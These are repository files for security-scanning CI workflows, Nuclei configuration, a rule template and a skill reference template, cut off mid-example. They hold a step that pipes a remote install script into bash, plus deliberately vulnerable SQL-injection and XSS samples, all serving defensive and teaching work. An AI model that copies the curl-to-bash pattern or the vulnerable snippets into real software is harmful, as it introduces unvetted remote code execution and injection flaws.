uses: actions/checkout@v4
- name: Run Checkov
run: |
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
cat > consolidated-report/security-summary.md << 'EOF'
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,192 @@
# GitHub Actions Workflow for Nuclei Security Scanning
# Place this file in .github/workflows/nuclei-scan.yml
name: Nuclei Security Scan
on:
push:
branches: [ main, develop ]
pull_request:
branches: [ main ]
schedule:
# Run daily at 2 AM UTC
- cron: '0 2 * * *'
workflow_dispatch:
inputs:
target_url:
description: 'Target URL to scan'
required: true
default: 'https://staging.example.com'
severity:
description: 'Severity levels (comma-separated)'
required: false
default: 'critical,high'
env:
# Default target URL (override with workflow_dispatch input)
TARGET_URL: https://staging.example.com
# Severity levels to scan
SEVERITY: critical,high
# Template tags to use
TEMPLATE_TAGS: cve,owasp,misconfig
jobs:
nuclei-scan:
name: Nuclei Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Run Nuclei Scan
id: nuclei
uses: projectdiscovery/nuclei-action@main
with:
target: ${{ github.event.inputs.target_url || env.TARGET_URL }}
severity: ${{ github.event.inputs.severity || env.SEVERITY }}
templates: ${{ env.TEMPLATE_TAGS }}
output: nuclei-results.jsonl
- name: Parse Nuclei Results
if: always()
run: |
# Install dependencies (if using custom parser)
# pip install -r requirements.txt
# Parse results and generate HTML report
if [ -f nuclei-results.jsonl ]; then
echo "Parsing Nuclei results..."
python3 scripts/parse_nuclei_results.py \
--input nuclei-results.jsonl \
--output nuclei-report.html \
--format html
# Count findings by severity
CRITICAL=$(grep -c '"severity":"critical"' nuclei-results.jsonl || echo 0)
HIGH=$(grep -c '"severity":"high"' nuclei-results.jsonl || echo 0)
TOTAL=$(wc -l < nuclei-results.jsonl)
echo "## Nuclei Scan Results" >> $GITHUB_STEP_SUMMARY
echo "- **Total Findings**: $TOTAL" >> $GITHUB_STEP_SUMMARY
echo "- **Critical**: $CRITICAL" >> $GITHUB_STEP_SUMMARY
echo "- **High**: $HIGH" >> $GITHUB_STEP_SUMMARY
# Set outputs
echo "critical=$CRITICAL" >> $GITHUB_OUTPUT
echo "high=$HIGH" >> $GITHUB_OUTPUT
echo "total=$TOTAL" >> $GITHUB_OUTPUT
else
echo "No findings detected" >> $GITHUB_STEP_SUMMARY
echo "critical=0" >> $GITHUB_OUTPUT
echo "high=0" >> $GITHUB_OUTPUT
echo "total=0" >> $GITHUB_OUTPUT
fi
- name: Upload SARIF file
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: nuclei.sarif
category: nuclei
- name: Upload Artifacts
if: always()
uses: actions/upload-artifact@v4
with:
name: nuclei-scan-results
path: |
nuclei-results.jsonl
nuclei-report.html
nuclei.sarif
retention-days: 30
- name: Comment on PR
if: github.event_name == 'pull_request' && always()
uses: actions/github-script@v7
with:
script: |
const critical = '${{ steps.nuclei.outputs.critical || 0 }}';
const high = '${{ steps.nuclei.outputs.high || 0 }}';
const total = '${{ steps.nuclei.outputs.total || 0 }}';
const body = `## 🔒 Nuclei Security Scan Results
| Severity | Count |
|----------|-------|
| Critical | ${critical} |
| High | ${high} |
| **Total** | **${total}** |
${critical > 0 ? '⚠️ **Critical vulnerabilities detected!**' : ''}
${high > 0 ? '⚠️ High severity vulnerabilities detected.' : ''}
View detailed results in the [workflow artifacts](https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }}).`;
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: body
});
- name: Fail on Critical Findings
if: steps.nuclei.outputs.critical > 0
run: |
echo "::error::Critical vulnerabilities detected!"
exit 1
- name: Notify on Slack
if: failure() && steps.nuclei.outputs.critical > 0
uses: slackapi/slack-github-action@v1
with:
payload: |
{
"text": "🚨 Critical vulnerabilities detected in ${{ github.repository }}",
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": "*Critical Security Vulnerabilities Detected*\n\n*Repository:* ${{ github.repository }}\n*Branch:* ${{ github.ref_name }}\n*Critical Findings:* ${{ steps.nuclei.outputs.critical }}\n*High Findings:* ${{ steps.nuclei.outputs.high }}\n\n<https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }}|View Scan Results>"
}
}
]
}
env:
SLACK_WEBHOOK_URL: ${{ secrets.SLACK_WEBHOOK_URL }}
# Optional: Separate job for authenticated scanning
nuclei-authenticated-scan:
name: Nuclei Authenticated Scan
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main' # Only run on main branch
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Run Authenticated Scan
uses: projectdiscovery/nuclei-action@main
with:
target: ${{ env.TARGET_URL }}
severity: critical,high
templates: cve,owasp
# Add authentication headers from secrets
headers: |
Authorization: Bearer ${{ secrets.API_TOKEN }}
Cookie: session=${{ secrets.SESSION_COOKIE }}
output: nuclei-auth-results.jsonl
- name: Upload Authenticated Results
if: always()
uses: actions/upload-artifact@v4
with:
name: nuclei-authenticated-scan-results
path: nuclei-auth-results.jsonl
retention-days: 30

View File

@@ -0,0 +1,225 @@
# Nuclei Configuration File
# Save as ~/.config/nuclei/config.yaml or specify with -config flag
# Template configuration
templates:
# Auto-update templates on each run
update-templates: true
# Template directory (default: ~/.nuclei-templates/)
# templates-directory: /custom/path/to/templates
# Custom template paths
# custom-templates:
# - /path/to/custom/templates/
# - /path/to/organization/templates/
# Scan configuration
severity:
- critical
- high
# - medium
# - low
# - info
# Rate limiting (requests per second)
rate-limit: 50
# Concurrency (parallel template execution)
concurrency: 10
# Bulk size (parallel host scanning)
bulk-size: 10
# Timeout per request (seconds)
timeout: 10
# Retries for failed requests
retries: 1
# HTTP configuration
http:
# User agent
user-agent: "Mozilla/5.0 (compatible; Nuclei/3.0)"
# Follow redirects
follow-redirects: true
# Max redirects to follow
max-redirects: 3
# Custom headers (applied to all requests)
# headers:
# - "X-Custom-Header: value"
# - "Authorization: Bearer token"
# Proxy configuration
# proxy: http://proxy.example.com:8080
# proxy-socks: socks5://proxy.example.com:1080
# Network configuration
network:
# Disable SSL/TLS verification (use with caution)
# disable-ssl-verification: false
# Enable HTTP/2
# disable-http2: false
# Output configuration
output:
# Silent mode (only show findings)
silent: false
# Verbose mode (detailed output)
verbose: false
# No color output
no-color: false
# JSON output
json: false
# JSONL output (one JSON per line)
jsonl: true
# SARIF output
# sarif: true
# Markdown output
# markdown: false
# Filtering configuration
filters:
# Exclude templates by ID
# exclude-ids:
# - template-id-1
# - template-id-2
# Exclude templates by tag
# exclude-tags:
# - tech
# - info
# Exclude severity levels
# exclude-severity:
# - info
# Include only specific tags
# tags:
# - cve
# - owasp
# Include only specific templates
# include-templates:
# - /path/to/template.yaml
# Performance tuning
performance:
# Maximum number of templates to run
# max-templates: 1000
# Maximum number of hosts to scan
# max-hosts: 10000
# Memory optimization (reduces memory usage)
# stream: true
# Disable update check
# disable-update-check: false
# CI/CD specific settings
ci:
# Fail on findings (exit code 1 if vulnerabilities found)
# fail-on-severity:
# - critical
# - high
# No interactive prompts
# no-interaction: true
# Suppress progress bars
# no-progress: true
# Authentication configuration
authentication:
# For authenticated scanning, use headers or custom authentication scripts
# See authentication_patterns.md reference for details
# Example: Bearer token authentication
# headers:
# - "Authorization: Bearer ${API_TOKEN}"
# Example: Cookie-based authentication
# headers:
# - "Cookie: session=${SESSION_COOKIE}"
# Reporting configuration
reporting:
# Report directory
# report-directory: ./nuclei-reports
# Report format
# report-format: json
# Include timestamp in filenames
# include-timestamp: true
# Advanced configuration
advanced:
# Follow host redirects (allow redirects to different hosts)
# follow-host-redirects: false
# Maximum response body size to read (in KB)
# max-response-size: 10240
# Include request/response in output
# include-rr: false
# Store response
# store-response: false
# Store response directory
# store-response-dir: ./responses/
# Exclude configuration (global exclusions)
exclude:
# Exclude specific hosts
# hosts:
# - https://safe-domain.com
# - https://third-party.com
# Exclude URL patterns (regex)
# urls:
# - ".*\\.js$"
# - ".*\\.css$"
# - ".*logout.*"
# Interactsh configuration (for OAST testing)
interactsh:
# Enable interactsh
# enable: true
# Custom interactsh server
# server: https://interact.sh
# Disable automatic polling
# disable-polling: false
# Cloud configuration (for cloud-specific templates)
cloud:
# Enable cloud metadata service checks
# enable-metadata: true
# Debug configuration
debug:
# Enable debug mode
# enable: false
# Debug requests
# debug-req: false
# Debug responses
# debug-resp: false
# Example usage:
# nuclei -u https://target.com -config nuclei_config.yaml

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
# - Direct DOM manipulation (innerHTML, document.write)
# - React dangerouslySetInnerHTML with user data
# - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Add CSP header -->
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
